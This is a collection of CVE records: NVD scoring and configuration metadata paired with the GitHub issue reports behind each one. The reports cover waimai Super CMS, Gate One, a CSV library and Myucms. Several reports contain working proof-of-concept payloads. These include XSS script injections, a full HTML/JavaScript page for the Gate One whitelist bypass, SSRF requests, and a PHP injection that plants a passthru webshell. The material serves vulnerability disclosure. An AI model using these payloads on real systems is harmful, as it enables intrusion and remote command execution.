First of all, we choose to use points to exchange products. for example you want to exchange this product, you need to use 5 points ![image](https://user-images.githubusercontent.com/33973549/70379120-a93c9d00-1963-11ea-9687-7082b0c42672.png) ![image](https://user-images.githubusercontent.com/33973549/70379124-b2c60500-1963-11ea-97fc-49ff9f0e70cf.png) Then we can get the request package. ![image](https://user-images.githubusercontent.com/33973549/70379131-bfe2f400-1963-11ea-982b-cb9f6d2db46a.png) We changed the value of the parameter credit to -1. ![image](https://user-images.githubusercontent.com/33973549/70379138-cbceb600-1963-11ea-9b54-0686ed1a2379.png) ![image](https://user-images.githubusercontent.com/33973549/70379150-d25d2d80-1963-11ea-9e41-75465b415efb.png) We've managed to get this product for free. ![image](https://user-images.githubusercontent.com/33973549/70379156-e143e000-1963-11ea-8521-4119bf89fcef.png)
This is a payment logic vulnerability that can modify the value of payment
https://api.github.com/repos/caokang/waimai/issues/15/comments
0
2019-12-07T18:45:05Z
2019-12-07T18:45:05Z
https://github.com/caokang/waimai/issues/15
534,437,419
15
2,659
CVE-2020-21504
2021-10-05T22:15:07.663
waimai Super Cms 20150505 contains a cross-site scripting (XSS) vulnerability in the component /admin.php?&m=Public&a=login.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/caokang/waimai/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/caokang/waimai/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:waimai_super_cms_project:waimai_super_cms:20150505:*:*:*:*:*:*:*", "matchCriteriaId": "9C15A529-8AEB-4B8E-BD27-92CE0CF8E421", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/caokang/waimai/issues/16
[ "Exploit", "Third Party Advisory" ]
github.com
[ "caokang", "waimai" ]
In waimai Super Cms master, there is an XSS vulnerability via the /admin.php?m=Config&a=add and /admin.php/Link/addsave Referer parameter, /?delURL=1&url=x&page= page parameter #1 Payload: Referer: '"></a><script>alert(123)</script> ![image](https://user-images.githubusercontent.com/33973549/70387587-d6c82b80-19e1-11ea-96ab-c51240a06290.png) ![image](https://user-images.githubusercontent.com/33973549/70387590-e6477480-19e1-11ea-922f-c902e1ed0b7e.png) ![image](https://user-images.githubusercontent.com/33973549/70387594-f0697300-19e1-11ea-9f61-2485b89e409b.png) #2 Payload: Referer: '"></a><script>alert(456)</script> ![image](https://user-images.githubusercontent.com/33973549/70387598-fc553500-19e1-11ea-89cd-b8841e62f37f.png) ![image](https://user-images.githubusercontent.com/33973549/70387600-02e3ac80-19e2-11ea-9c6e-59e7018d3e01.png) ![image](https://user-images.githubusercontent.com/33973549/70387602-0840f700-19e2-11ea-9563-c75ea607d4f8.png) #3 Payload: POST /?delURL=1&url=x&page=%22;alert(xssone);%20var%20d=%22 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Referer: http://localhost/admin.php?&m=Public&a=login Cookie: PHPSESSID=bld8qdt5dvpos2iv44l50g7196 Connection: keep-alive Host: localhost Content-Length: 0 Accept: */* Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded ![image](https://user-images.githubusercontent.com/33973549/70387605-12fb8c00-19e2-11ea-9203-f2b343fa1671.png) ![image](https://user-images.githubusercontent.com/33973549/70387639-68d03400-19e2-11ea-81e7-96206ae29c3d.png)
Three XSS vulnerabilities found in Waimai Super Cms
https://api.github.com/repos/caokang/waimai/issues/16/comments
0
2019-12-08T09:45:05Z
2019-12-08T09:45:05Z
https://github.com/caokang/waimai/issues/16
534,516,856
16
2,660
CVE-2020-19003
2021-10-06T13:15:07.267
An issue in Gate One 1.2.0 allows attackers to bypass to the verification check done by the origins list and connect to Gate One instances used by hosts not on the origins list.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/290.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/liftoff/GateOne/issues/728" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/290.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/liftoff/GateOne/issues/728" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:liftoffsoftware:gate_one:1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "D59AF5C8-BA89-4BB5-AF30-78C8A84CC6E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "290" ]
290
https://github.com/liftoff/GateOne/issues/728
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "liftoff", "GateOne" ]
There is a configuration item ”origins”:[“127.0.0.1”,”localhost”] in file server.conf of Gate One. When the authenticate method is ”auth”:”api” , only the host which is in the list of origins can access to the gateone host. If not, the gateone will return “The authentication object was denied by the server. Click OK to reload the page” to the host which are not in origins list. ### Vulnerability description: The vulnerability allows the attacker bypass the origins list and connect to gateone used by the hosts which are not in origins list. The cause of issue is due to the drawback of verifying origins. When the attacker user localhost to access Gate One, Gate One recognize it as “localhost” instead of the real IP of attacker. Thus the attacker can pretend to be the “localhost” to bypass the method of Verifying Origins list. ### Vulnerability reproduce: Environment:  - The Gate One service is deployed by the attacked host B (192.168.159.148); - The gateone service used the authenticate method ”auth”:”api”; - The “localhost” is in the list of origins like that ”origins”:[“127.0.0.1”,”localhost”] in server.conf; - The attacker has corrected api_keys; - The IP address of attack host A (192.168.159.1) is not in the list of origins. ###Steps: 1. Make http service in the attack host A, and load the payload page gateone.html as followed: ``` html <!DOCTYPE html>   <html lang="en">   <head>       <meta charset="UTF-8">       <title>Title</title>   </head>   <body>   <button onclick="test()">test</button>   Attacked host 192.168.159.148:81      <div id="gateone_container" style="width:60em;height: 30em">     <div id="gateone"></div>   </div>      </body>   </html>   <script src="http://192.168.159.148:81/static/gateone.js"></script>   <script src="./jquery-3.3.1.min.js"></script>   <script src="./CryptoJS.js"></script>   <script type="text/javascript">   function test(){       var upn = "gateone";        var key = "NmXXXXXXZTVlMTNiNDAwYXXXXXXhNmE0OWE4YzNiNTYzZ";        var secret = "ZDXXXXXXYjlmOWIzNGXXXXXYzk4ODc0OTc4Zjk1MTQ5Z";       var timestamp=  Date.parse(new Date());        var body = key + upn + timestamp;       var sha1_result=CryptoJS.HmacSHA1(body,secret);           var auth = {           'api_key': key,           'upn':upn,           'timestamp': timestamp,           'signature': sha1_result.toString(),           'signature_method': 'HMAC-SHA1',           'api_version': '1.0'       }       console.log(auth);       GateOne.init({           auth: auth,           url: 'http://192.168.159.148:81',           goDiv: '#gateone',       });        GateOne.Net.autoConnect();       }  </script> ``` 2. Access the page by URL “localhost:8000/gateone.html” in the attack host A, the response is as followed: ![image](https://user-images.githubusercontent.com/33822448/55779759-eac92f80-5ad8-11e9-8c50-24fb7e326521.png) 3. To make sure the attacker has tried to access the Gate One server, check the gateone log in the attacked host B, the result is as followed: ![image](https://user-images.githubusercontent.com/33822448/55779842-206e1880-5ad9-11e9-8f39-393cb24f8af7.png) It proves that Gate One not recorded the real IP address of attack host A(192.168.159.1) instead of “localhost:8080“ when the service verifies the “Origin”. 4. Change http service port 8080 to 80 on attack host A 5. Access the page by URL “localhost/gateone.html” in the attack host A, the response is as followed: ![image](https://user-images.githubusercontent.com/33822448/55779855-28c65380-5ad9-11e9-9055-4d976d81493a.png) It means the attack host A has connect to the Gate One successfully. 6. Check logs of Gate One, the attack host A 192.168.159.1 established a connection with the attacked host: ![image](https://user-images.githubusercontent.com/33822448/55779865-34197f00-5ad9-11e9-84a9-946ca98924ca.png)
Gate One Whitelist Bypass
https://api.github.com/repos/liftoff/GateOne/issues/728/comments
1
2019-04-09T07:10:01Z
2019-05-24T06:36:54Z
https://github.com/liftoff/GateOne/issues/728
430,802,548
728
2,661
CVE-2021-41128
2021-10-06T18:15:11.067
Hygeia is an application for collecting and processing personal and case data in connection with communicable diseases. In affected versions all CSV Exports (Statistics & BAG MED) contain a CSV Injection Vulnerability. Users of the system are able to submit formula as exported fields which then get executed upon ingestion of the exported file. There is no validation or sanitization of these formula fields and so malicious may construct malicious code. This vulnerability has been resolved in version 1.30.4. There are no workarounds and all users are advised to upgrade their package.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.1, "impactScore": 5.3, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/beatrichartz/csv/issues/103" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/beatrichartz/csv/pull/104" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jshmrtn/hygeia/commit/d917f27432fe84e1c9751222ae55bae36a4dce60" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jshmrtn/hygeia/security/advisories/GHSA-8pwv-jhj2-2369" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/CSV_Injection" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/beatrichartz/csv/issues/103" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/beatrichartz/csv/pull/104" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jshmrtn/hygeia/commit/d917f27432fe84e1c9751222ae55bae36a4dce60" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jshmrtn/hygeia/security/advisories/GHSA-8pwv-jhj2-2369" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://owasp.org/www-community/attacks/CSV_Injection" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hygeia_project:hygeia:*:*:*:*:*:*:*:*", "matchCriteriaId": "F7DDCC54-C4E6-4E39-8F2B-AE90486E8AC1", "versionEndExcluding": "1.30.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.11.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/beatrichartz/csv/issues/103
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "beatrichartz", "csv" ]
**If this is a feature request, why do we need it?** - We are using this library to generate CSVs for user-generated input and transmitting them to another party. (Which sadly requires a CSV and not a sane format like a JSON) - We did a pentest on the application - Security Advisory: https://github.com/jshmrtn/hygeia/security/advisories/GHSA-8pwv-jhj2-2369 - The pentest uncovered a [CSV Injection vulnerability](https://owasp.org/www-community/attacks/CSV_Injection), if the user-generated input includes formulas like `=1+1` To address this, I suggest to implement encoding of `=1+1` as `"'=1+1"` **If this is a bug, steps to reproduce it** - Generate a CSV with a cell value of `=1+1` - Open with Excel - See value `2` - Is your input CSV [RFC 4180](https://tools.ietf.org/html/rfc4180) compliant? - Yes - Are you interested in helping with a PR? - Yes
Encode Formulas to prevent CSV injection
https://api.github.com/repos/beatrichartz/csv/issues/103/comments
1
2021-10-06T08:33:36Z
2022-09-17T02:10:49Z
https://github.com/beatrichartz/csv/issues/103
1,017,789,930
103
2,662
CVE-2020-21649
2021-10-06T22:15:07.740
Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sql() method.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/4" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:myucms_project:myucms:2.2:*:*:*:*:*:*:*", "matchCriteriaId": "E6EECCAA-F4A9-4487-B39D-F50A1AD720D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/lolipop1234/XXD/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "lolipop1234", "XXD" ]
1.Visit the following URL after login http://127.0.0.1/admin.php/index/sql 2.POST following data to http://127.0.0.1/admin.php/index/sql sql=http://www.baidu.com ![image](https://user-images.githubusercontent.com/30997848/71565694-52525f80-2aec-11ea-9460-3df27f68e40a.png) 3.Visit error message Web file content has been read ![image](https://user-images.githubusercontent.com/30997848/71565719-73b34b80-2aec-11ea-9816-8689e41e0ea3.png) Problem code location WWW\application\admin\controller\index.php ![image](https://user-images.githubusercontent.com/30997848/71565732-8a59a280-2aec-11ea-8c22-23a46e0a3540.png)
SSRF of Myucms v2.2 /application/admin/controller/index.php sql() method
https://api.github.com/repos/lolipop1234/XXD/issues/4/comments
0
2019-12-27T02:50:43Z
2019-12-30T02:11:06Z
https://github.com/lolipop1234/XXD/issues/4
542,723,107
4
2,663
CVE-2020-21650
2021-10-06T22:15:07.780
Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the add() method.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/6" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:myucms_project:myucms:2.2:*:*:*:*:*:*:*", "matchCriteriaId": "E6EECCAA-F4A9-4487-B39D-F50A1AD720D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/lolipop1234/XXD/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "lolipop1234", "XXD" ]
1.Visit the following URL after login http:// 127.0.0.1/admin.php/config/add?accesskey=%27,phpinfo(),%27 2.Then visit the following page http://127.0.0.1/application/extra/web.php ![image](https://user-images.githubusercontent.com/30997848/71565138-8034a580-2ae6-11ea-9e0c-fdfacbb32549.png) Problem code location WWW\application\admin\controller\Config.php ![image](https://user-images.githubusercontent.com/30997848/71565154-9fcbce00-2ae6-11ea-9d0d-0490947408dd.png) ![image](https://user-images.githubusercontent.com/30997848/71565161-bc680600-2ae6-11ea-8270-c32adaa1753b.png)
Arbitrary command execution of Myucms v2.2 config.php add() method
https://api.github.com/repos/lolipop1234/XXD/issues/6/comments
0
2019-12-27T02:56:43Z
2019-12-30T01:28:45Z
https://github.com/lolipop1234/XXD/issues/6
542,724,055
6
2,664
CVE-2020-21651
2021-10-06T22:15:07.823
Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\point.php, which can be exploited via the add() method.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:myucms_project:myucms:2.2:*:*:*:*:*:*:*", "matchCriteriaId": "E6EECCAA-F4A9-4487-B39D-F50A1AD720D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/lolipop1234/XXD/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "lolipop1234", "XXD" ]
1.Visit the following URL after login http:// 127.0.0.1/admin.php/point/add?JIFENNAME=%27,phpinfo(),%27 2.Then visit the following page http://127.0.0.1/application/extra/point.php ![image](https://user-images.githubusercontent.com/30997848/71565247-d229fb00-2ae7-11ea-9cbf-4fd5649b525e.png) Problem code location WWW\application\admin\controller\point.php ![image](https://user-images.githubusercontent.com/30997848/71565239-b7f01d00-2ae7-11ea-8938-f74675e664da.png)
Arbitrary command execution of Myucms v2.2 point.php add() method
https://api.github.com/repos/lolipop1234/XXD/issues/3/comments
0
2019-12-27T02:42:28Z
2019-12-30T01:36:26Z
https://github.com/lolipop1234/XXD/issues/3
542,721,752
3
2,665
CVE-2020-21652
2021-10-06T22:15:07.863
Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the addqq() method.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/96.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:myucms_project:myucms:2.2:*:*:*:*:*:*:*", "matchCriteriaId": "E6EECCAA-F4A9-4487-B39D-F50A1AD720D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/lolipop1234/XXD/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "lolipop1234", "XXD" ]
1.Visit the following URL after login http://xxx.com/admin.php/config/addqq?qq-appid=%27,passthru($_GET[ha]),%27 ![image](https://user-images.githubusercontent.com/30997848/71565197-39937b00-2ae7-11ea-8221-c52137b9117f.png) 2.Then visit the following page http://127.0.0.1/application/extra/qq.php?ha=ipconfig ![image](https://user-images.githubusercontent.com/30997848/71565201-41ebb600-2ae7-11ea-947c-9c1a57413deb.png) Problem code location WWW\application\admin\controller\Config.php ![image](https://user-images.githubusercontent.com/30997848/71565182-15d03500-2ae7-11ea-8ef1-3551a7897569.png)
Arbitrary command execution of Myucms v2.2 config.php addqq() method
https://api.github.com/repos/lolipop1234/XXD/issues/7/comments
0
2019-12-27T02:57:04Z
2019-12-30T01:33:26Z
https://github.com/lolipop1234/XXD/issues/7
542,724,120
7
2,666
CVE-2020-21653
2021-10-06T22:15:07.903
Myucms v2.2.1 contains a server-side request forgery (SSRF) in the component \controller\index.php, which can be exploited via the sj() method.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/lolipop1234/XXD/issues/5" } ]
